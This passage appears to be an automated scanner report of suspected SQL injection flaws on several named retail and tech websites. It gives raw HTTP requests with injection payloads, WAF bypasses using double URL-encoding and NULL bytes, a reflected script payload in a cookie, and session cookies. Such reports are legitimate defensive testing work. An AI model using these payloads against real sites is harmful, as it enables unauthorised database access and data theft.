ETag: "25d8568-354-49ec407d4ae40"
Accept-Ranges: bytes
Content-Length: 852
Vary: User-Agent
Connection: close
Content-Type: text/css

div.sociable { margin: 16px 0; }

span.sociable_tagline { position: relative; }
span.sociable_tagline span { display: none; width: 14em; }
span.sociable_tagline:hover span {
   position: absolute;
   display: block;
   top: -5em;
   background: #ffe;
   border: 1px solid #ccc;
   color: black;
   line-height: 1.25em;
}
.sociable span {
   display: block;
}
.sociable ul {
   display: inline;
   margin: 0 !important;
   padding: 0 !important;
}
.sociable ul li {
   background: none;
   display: inline !important;
   list-style-type: none;
   margin: 0;
   padding: 1px;
}
.sociable ul li:before { content: ""; }
.sociable img {
   float: none;
   width: 16px;
   height: 16px;
   border: 0;
   margin: 0;
   padding: 0;
}

.sociable-hovers {
   opacity: .4;
   -moz-opacity: .4;
   filter: alpha(opacity=40);
}
.sociable-hovers:hover {
   opacity: 1;
   -moz-opacity: 1;
   filter: alpha(opacity=100);
}

1.12. http://www.pcaholic.com/wp-includes/js/jquery/jquery.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 88865280%20or%201%3d1--%20 and 88865280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:43 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-includes Js Jquery Jquery Js?188865280%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.j
...[SNIP]...

Request 2

GET /wp-includes/js/jquery/jquery.js?188865280%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 11 Jul 2011 21:20:05 GMT
ETag: "25d8059-164e3-4a7d1bf388b40"
Accept-Ranges: bytes
Content-Length: 91363
Vary: User-Agent
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Thu May 12 15:04:36 2011 -0400
*/
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.body.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&
...[SNIP]...

1.13. http://www.pcaholic.com/wp-includes/js/l10n.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /wp-includes/js/l10n.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17799343%20or%201%3d1--%20 and 17799343%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-includes/js/l10n.js?117799343%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Wp-includes Js L10n Js?117799343%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.js?ver=1.6
...[SNIP]...

Request 2

GET /wp-includes/js/l10n.js?117799343%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 11 Jul 2011 21:20:05 GMT
ETag: "25d8221-134-4a7d1bf388b40"
Accept-Ranges: bytes
Content-Length: 308
Vary: User-Agent
Connection: close
Content-Type: application/javascript

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};

1.14. http://www.pcaholic.com/xmlrpc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pcaholic.com
Path:   /xmlrpc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15000864%20or%201%3d1--%20 and 15000864%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /xmlrpc.php?115000864%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.pcaholic.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 30 Sep 2011 12:39:40 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Nothing found for Xmlrpc Php?115000864%20or%201%3d1--%20=1</title>
<meta name="google-site-verification" content="5NxqTfsAsneU2HvYnF5BuLdVSvQRPi8u-7KrKrkD3_k" />
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/begindownload.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.pcaholic.com/wp-content/themes/pcaholic/scripts/toggle.js"></script>
<link href="http://www.pcaholic.com/wp-content/themes/pcaholic/style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="http://www.pcaholic.com/wp-content/themes/pcaholic/images/favicon.ico" />
<link rel='stylesheet' id='contact-form-7-css' href='http://www.pcaholic.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='sociable-front-css-css' href='http://www.pcaholic.com/wp-content/plugins/sociable/sociable.css?ver=3.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/l10n.js?ver=20101110'></script>
<script type='text/javascript' src='http://www.pcaholic.com/wp-includes/js/jquery/jquery.js?ver=1.6.1'></script
...[SNIP]...

Request 2

GET /xmlrpc.php?115000864%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pcaholic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:39:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain
Content-Length: 42

XML-RPC server accepts POST requests only.

1.15. http://www.sycro.com/sycro/comm/stats.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sycro.com
Path:   /sycro/comm/stats.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:54 GMT
X-Powered-By: ASP.NET
Connection: close
Location: /sycro/order/basket.asp?mode=error500
Content-Length: 158
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/sycro/order/basket.asp?mode=error500">here</a>.</body>

Request 2

GET /sycro/comm/stats.asp HTTP/1.1
Host: www.sycro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 12:32:55 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 21
Content-Type: application/x-javascript
Cache-control: private


document.write("");

1.16. http://www.tigerdirect.ca/cgi-bin/order.asp [EdpNo parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The EdpNo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the EdpNo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cgi-bin/order.asp?EdpNo=1104495'&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:29:41 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=a4be4dd25e0ad12821b1539&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12; path=/
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Vary: Accept-Encoding
Content-Length: 67521


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--e(source) :Microsoft OLE DB Provider for ODBC Drivers-->
...[SNIP]...

1.17. https://www.tigerdirect.ca/secure/orderlogin.asp [PG parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /secure/orderlogin.asp?PG=1%2527 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43346
Content-Type: text/html
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&CaptchaOutVal=&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp?PG=1%2527%2527 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:30 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 49806
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:30 GMT
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:30 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=%5D%5D%3E%3E&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.18. https://www.tigerdirect.ca/secure/orderlogin.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:38 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43364
Content-Type: text/html
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&CaptchaOutVal=&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=596c7%250d%250aef0438428a3&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:39 GMT
